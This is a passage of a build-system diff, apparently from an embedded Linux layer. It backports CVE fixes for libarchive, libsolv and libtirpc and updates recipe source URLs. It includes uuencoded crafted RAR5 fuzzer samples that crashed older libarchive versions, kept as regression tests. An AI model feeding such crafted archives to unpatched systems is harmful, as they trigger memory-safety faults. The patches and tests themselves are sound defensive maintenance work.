++	PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
++
++	/* Return codes of those calls are ignored, because this sample file
++	 * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++	 * errors during processing. */
++
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++	EPILOGUE();
++}
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+@@ -0,0 +1,10 @@
++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
+From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Fri, 12 Feb 2021 20:18:31 +0100
+Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
+
+RAR5 reader uses several variables to manage the window buffer during
+extraction: the buffer itself (`window_buf`), the current size of the
+window buffer (`window_size`), and a helper variable (`window_mask`)
+that is used to constrain read and write offsets to the window buffer.
+
+Some specially crafted files can force the unpacker to update the
+`window_mask` variable to a value that is out of sync with current
+buffer size. If the `window_mask` will be bigger than the actual buffer
+size, then an invalid access operation can happen (SIGSEGV).
+
+This commit ensures that if the `window_size` and `window_mask` will be
+changed, the window buffer will be reallocated to the proper size, so no
+invalid memory operation should be possible.
+
+This commit contains a test file from OSSFuzz #30442.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ Makefile.am                                   |  1 +
+ libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
+ libarchive/test/test_read_format_rar5.c       | 17 ++++++++++++
+ ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
+ 4 files changed, 50 insertions(+), 6 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
+ 	libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ 	libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ 	libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
++	libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
+ 	libarchive/test/test_read_format_raw.bufr.uu \
+ 	libarchive/test/test_read_format_raw.data.gz.uu \
+ 	libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
+ 		}
+ 	}
+ 
+-	/* If we're currently switching volumes, ignore the new definition of
+-	 * window_size. */
+-	if(rar->cstate.switch_multivolume == 0) {
+-		/* Values up to 64M should fit into ssize_t on every
+-		 * architecture. */
+-		rar->cstate.window_size = (ssize_t) window_size;
++	if(rar->cstate.window_size < (ssize_t) window_size &&
++	    rar->cstate.window_buf)
++	{
++		/* If window_buf has been allocated before, reallocate it, so
++		 * that its size will match new window_size. */
++
++		uint8_t* new_window_buf =
++			realloc(rar->cstate.window_buf, window_size);
++
++		if(!new_window_buf) {
++			archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
++				"Not enough memory when trying to realloc the window "
++				"buffer.");
++			return ARCHIVE_FATAL;
++		}
++
++		rar->cstate.window_buf = new_window_buf;
+ 	}
+ 
++	/* Values up to 64M should fit into ssize_t on every
++	 * architecture. */
++	rar->cstate.window_size = (ssize_t) window_size;
++
+ 	if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
+ 		/* Solid files have to have the same window_size across
+ 		   whole archive. Remember the window_size parameter
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
+ 	EPILOGUE();
+ }
+ 
++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
++{
++	/* oss fuzz 30442 */
++
++	char buf[4096];
++	PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
++
++	/* Return codes of those calls are ignored, because this sample file
++	 * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++	 * errors during processing. */
++
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, 46)) {}
++
++	EPILOGUE();
++}
++
+ DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
+ {
+ 	char buf[4096];
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+@@ -0,0 +1,11 @@
++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
+From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 10:13:22 +0100
+Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
+ parameters
+
+Some specially crafted files declare invalid extraction parameters that
+can confuse the RAR5 reader.
+
+One of the arguments is the declared window size parameter that the
+archive file can declare for each file stored in the archive. Some
+crafted files declare window size equal to 0, which is clearly wrong.
+
+This commit adds additional safety checks decreasing the tolerance of
+the RAR5 format.
+
+This commit also contains OSSFuzz sample #30459.
+---
+ Makefile.am                                   |  1 +
+ libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
+ libarchive/test/test_read_format_rar5.c       | 19 +++++++++++++++++++
+ ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu |  7 +++++++
+ 4 files changed, 37 insertions(+)
+ create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+--- libarchive-3.4.2.orig/Makefile.am
++++ libarchive-3.4.2/Makefile.am
+@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
+ 	libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ 	libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ 	libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
++	libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
+ 	libarchive/test/test_read_format_raw.bufr.uu \
+ 	libarchive/test/test_read_format_raw.data.gz.uu \
+ 	libarchive/test/test_read_format_raw.data.Z.uu \
+--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
+@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
+ 		rar->cstate.initialized = 1;
+ 	}
+ 
++	/* Don't allow extraction if window_size is invalid. */
++	if(rar->cstate.window_size == 0) {
++		archive_set_error(&a->archive,
++			ARCHIVE_ERRNO_FILE_FORMAT,
++			"Invalid window size declaration in this file");
++
++		/* This should never happen in valid files. */
++		return ARCHIVE_FATAL;
++	}
++
+ 	if(rar->cstate.all_filters_applied == 1) {
+ 		/* We use while(1) here, but standard case allows for just 1
+ 		 * iteration. The loop will iterate if process_block() didn't
+--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
+@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
+ 
+ 	EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
++{
++	/* oss fuzz 30459 */
++
++	char buf[4096];
++	PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
++
++	/* This file is damaged, so those functions should return failure.
++	 * Additionally, SIGSEGV shouldn't be raised during execution
++	 * of those functions. */
++
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++	EPILOGUE();
++}
+--- /dev/null
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+@@ -0,0 +1,7 @@
++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
++5$"`OX2`@[.SL[.S_("`@("`@("`@
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
new file mode 100644
index 0000000000..501fcc5848
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
+From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
+From: Tim Kientzle <kientzle@acm.org>
+Date: Thu, 24 Mar 2022 10:35:00 +0100
+Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
+ zipx_lzma_alone_init()
+
+Fixes #1672
+
+CVE: CVE-2022-26280
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+
+---
+ libarchive/archive_read_support_format_zip.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
+index 38ada70b5..9d6c900b2 100644
+--- a/libarchive/archive_read_support_format_zip.c
++++ b/libarchive/archive_read_support_format_zip.c
+@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
+ 	 */
+ 
+ 	/* Read magic1,magic2,lzma_params from the ZIPX stream. */
+-	if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
++	if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
+ 		archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
+ 		    "Truncated lzma data");
+ 		return (ARCHIVE_FATAL);
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
new file mode 100644
index 0000000000..980a0e884a
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
+From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
+From: obiwac <obiwac@gmail.com>
+Date: Fri, 22 Jul 2022 22:41:10 +0200
+Subject: [PATCH] CVE-2022-36227
+
+libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
+CVE: CVE-2022-36227
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com
+---
+ libarchive/archive_write.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
+index 98a55fb..7fe88b6 100644
+--- a/libarchive/archive_write.c
++++ b/libarchive/archive_write.c
+@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
+ 	struct archive_write_filter *f;
+ 
+ 	f = calloc(1, sizeof(*f));
++
++	if (f == NULL)
++		return (NULL);
++
+ 	f->archive = _a;
+ 	f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
+ 	if (a->filter_first == NULL)
+@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
+ 	a->client_data = client_data;
+ 
+ 	client_filter = __archive_write_allocate_filter(_a);
++
++	if (client_filter == NULL)
++		return (ARCHIVE_FATAL);
++
+ 	client_filter->open = archive_write_client_open;
+ 	client_filter->write = archive_write_client_write;
+ 	client_filter->close = archive_write_client_close;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
index 0ab40fc096..728eedc401 100644
--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
 
 EXTRA_OECONF += "--enable-largefile"
 
-SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz"
+SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
+           file://CVE-2021-36976-1.patch \
+           file://CVE-2021-36976-2.patch \
+           file://CVE-2021-36976-3.patch \
+           file://CVE-2021-23177.patch \
+           file://CVE-2021-31566-01.patch \
+           file://CVE-2021-31566-02.patch \
+           file://CVE-2022-26280.patch \
+           file://CVE-2022-36227.patch \
+"
 
 SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
 SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"
 
+# upstream-wontfix: upstream has documented that reported function is not thread-safe
+CVE_CHECK_WHITELIST += "CVE-2023-30571"
+
 inherit autotools update-alternatives pkgconfig
 
 CPPFLAGS += "-I${WORKDIR}/extra-includes"
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb
index 28c84af7ad..cbb38674b9 100644
--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}"
 
 SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3"
 
-SRC_URI = "git://github.com/thkukuk/libnsl \
+SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
           "
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb
index a1d914e871..0ec64544be 100644
--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 SECTION = "libs"
 DEPENDS += "libtirpc libnsl2"
 
-PV = "3.1+git${SRCPV}"
+PV = "3.2"
 
-SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad"
+SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59"
 
-SRC_URI = "git://github.com/thkukuk/libnss_nis \
+SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
           "
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
new file mode 100644
index 0000000000..fa577fd533
--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
+From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
+From: Michael Schroeder <mls@suse.de>
+Date: Mon, 14 Dec 2020 11:12:00 +0100
+Subject: [PATCH] testcase_read: error out if repos are added or the system is
+ changed too late
+
+We must not add new solvables after the considered map was created, the solver
+was created, or jobs were added. We may not changed the system after jobs have
+been added.
+
+(Jobs may point inside the whatproviedes array, so we must not invalidate this
+area.)
+
+Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
+CVE: CVE-2021-3200
+CVE: CVE-2021-33928
+CVE: CVE-2021-33929
+CVE: CVE-2021-33930
+CVE: CVE-2021-33938
+CVE: CVE-2021-44568
+CVE: CVE-2021-44569
+CVE: CVE-2021-44570
+CVE: CVE-2021-44571
+CVE: CVE-2021-44573
+CVE: CVE-2021-44574
+CVE: CVE-2021-44575
+CVE: CVE-2021-44576
+CVE: CVE-2021-44577
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ ext/testcase.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ext/testcase.c b/ext/testcase.c
+index 0be7a213..8fb6d793 100644
+--- a/ext/testcase.c
++++ b/ext/testcase.c
+@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+   Id *genid = 0;
+   int ngenid = 0;
+   Queue autoinstq;
++  int oldjobsize = job ? job->count : 0;
+ 
+   if (resultp)
+     *resultp = 0;
+@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ 	  int prio, subprio;
+ 	  const char *rdata;
+ 
++	  if (pool->considered)
++	    {
++	      pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
++	      continue;
++	    }
++	  if (solv)
++	    {
++	      pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
++	      continue;
++	    }
++	  if (job && job->count != oldjobsize)
++	    {
++	      pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
++	      continue;
++	    }
+ 	  prepared = 0;
+           if (!poolflagsreset)
+ 	    {
+@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ 	  int i;
+ 
+ 	  /* must set the disttype before the arch */
++	  if (job && job->count != oldjobsize)
++	    {
++	      pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
++	      continue;
++	    }
+ 	  prepared = 0;
+ 	  if (strcmp(pieces[2], "*") != 0)
+ 	    {
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
index 265a27c00d..2c2aedc32c 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Library for solving packages and reading repositories"
+DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories"
 HOMEPAGE = "https://github.com/openSUSE/libsolv"
 BUGTRACKER = "https://github.com/openSUSE/libsolv/issues"
 SECTION = "devel"
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
 
 DEPENDS = "expat zlib"
 
-SRC_URI = "git://github.com/openSUSE/libsolv.git \
+SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
+           file://CVE-2021-3200.patch \
 "
 
 SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378"
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
new file mode 100644
index 0000000000..c78e7ef4d5
--- /dev/null
+++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch
@@ -0,0 +1,155 @@
+From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 28 Jul 2022 09:11:04 +0530
+Subject: [PATCH] CVE-2021-46828
+
+Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed}
+CVE: CVE-2021-46828
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/svc.c    | 17 +++++++++++++-
+ src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++-
+ 2 files changed, 77 insertions(+), 2 deletions(-)
+
+diff --git a/src/svc.c b/src/svc.c
+index 6db164b..3a8709f 100644
+--- a/src/svc.c
++++ b/src/svc.c
+@@ -57,7 +57,7 @@
+ 
+ #define max(a, b) (a > b ? a : b)
+ 
+-static SVCXPRT **__svc_xports;
++SVCXPRT **__svc_xports;
+ int __svc_maxrec;
+ 
+ /*
+@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock)
+     rwlock_unlock (&svc_fd_lock);
+ }
+ 
++int
++svc_open_fds()
++{
++	int ix;
++	int nfds = 0;
++
++	rwlock_rdlock (&svc_fd_lock);
++	for (ix = 0; ix < svc_max_pollfd; ++ix) {
++		if (svc_pollfd[ix].fd != -1)
++			nfds++;
++	}
++	rwlock_unlock (&svc_fd_lock);
++	return (nfds);
++}
++
+ /*
+  * Add a service program to the callout list.
+  * The dispatch routine will be called when a rpc request for this
+diff --git a/src/svc_vc.c b/src/svc_vc.c
+index c23cd36..1729963 100644
+--- a/src/svc_vc.c
++++ b/src/svc_vc.c
+@@ -64,6 +64,8 @@
+ 
+ 
+ extern rwlock_t svc_fd_lock;
++extern SVCXPRT **__svc_xports;
++extern int svc_open_fds();
+ 
+ static SVCXPRT *makefd_xprt(int, u_int, u_int);
+ static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *);
+@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *);
+ static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in);
+ static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq,
+ 				   	     void *in);
++static int __svc_destroy_idle(int timeout);
+ 
+ struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */
+ 	u_int sendsize;
+@@ -312,13 +315,14 @@ done:
+ 	return (xprt);
+ }
+ 
++
+ /*ARGSUSED*/
+ static bool_t
+ rendezvous_request(xprt, msg)
+ 	SVCXPRT *xprt;
+ 	struct rpc_msg *msg;
+ {
+-	int sock, flags;
++	int sock, flags, nfds, cnt;
+ 	struct cf_rendezvous *r;
+ 	struct cf_conn *cd;
+ 	struct sockaddr_storage addr;
+@@ -378,6 +382,16 @@ again:
+ 
+ 	gettimeofday(&cd->last_recv_time, NULL);
+ 
++	nfds = svc_open_fds();
++	if (nfds >= (_rpc_dtablesize() / 5) * 4) {
++		/* destroy idle connections */
++		cnt = __svc_destroy_idle(15);
++		if (cnt == 0) {
++			/* destroy least active */
++			__svc_destroy_idle(0);
++		}
++	}
++
+ 	return (FALSE); /* there is never an rpc msg to be processed */
+ }
+ 
+@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock)
+ {
+ 	return FALSE;
+ }
++
++static int
++__svc_destroy_idle(int timeout)
++{
++	int i, ncleaned = 0;
++	SVCXPRT *xprt, *least_active;
++	struct timeval tv, tdiff, tmax;
++	struct cf_conn *cd;
++
++	gettimeofday(&tv, NULL);
++	tmax.tv_sec = tmax.tv_usec = 0;
++	least_active = NULL;
++	rwlock_wrlock(&svc_fd_lock);
++
++	for (i = 0; i <= svc_max_pollfd; i++) {
++		if (svc_pollfd[i].fd == -1)
++			continue;
++		xprt = __svc_xports[i];
++		if (xprt == NULL || xprt->xp_ops == NULL ||
++			xprt->xp_ops->xp_recv != svc_vc_recv)
++			continue;
++		cd = (struct cf_conn *)xprt->xp_p1;
++		if (!cd->nonblock)
++			continue;
++		if (timeout == 0) {
++			timersub(&tv, &cd->last_recv_time, &tdiff);
++			if (timercmp(&tdiff, &tmax, >)) {
++				tmax = tdiff;
++				least_active = xprt;
++			}
++			continue;
++		}
++		if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) {
++			__xprt_unregister_unlocked(xprt);
++			__svc_vc_dodestroy(xprt);
++			ncleaned++;
++		}
++	}
++	if (timeout == 0 && least_active != NULL) {
++		__xprt_unregister_unlocked(least_active);
++		__svc_vc_dodestroy(least_active);
++		ncleaned++;
++	}
++	rwlock_unlock(&svc_fd_lock);
++	return (ncleaned);
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
index 10a324c3b6..80151ff83a 100644
--- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
+++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \
 
 PROVIDES = "virtual/librpc"
 
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2"
+SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \
+	   file://CVE-2021-46828.patch \
+	  "
 UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/"
 UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/"
 SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb"
@@ -20,7 +22,7 @@ inherit autotools pkgconfig
 EXTRA_OECONF = "--disable-gssapi"
 
 do_install_append() {
-	chown root:root ${D}${sysconfdir}/netconfig
+	test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig
 }
 
 BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
-From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001
+From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
 From: Alexander Kanavin <alex.kanavin@gmail.com>
 Date: Fri, 26 Aug 2016 18:20:32 +0300
 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
 RP 2014/5/22
 Upstream-Status: Pending
 Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
 ---
  configure.ac | 16 ++++++++++++----
  1 file changed, 12 insertions(+), 4 deletions(-)
 
 diff --git a/configure.ac b/configure.ac
-index 5383cec..c29a902 100644
+index dbddfb9..62cf17f 100644
 --- a/configure.ac
 +++ b/configure.ac
-@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre],
+@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
  )
  AC_MSG_RESULT([$WITH_PCRE])
  
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
    else
      AC_PATH_PROG([PCRECONFIG], [pcre-config])
      if test -n "$PCRECONFIG"; then
--- 
-2.15.0
-
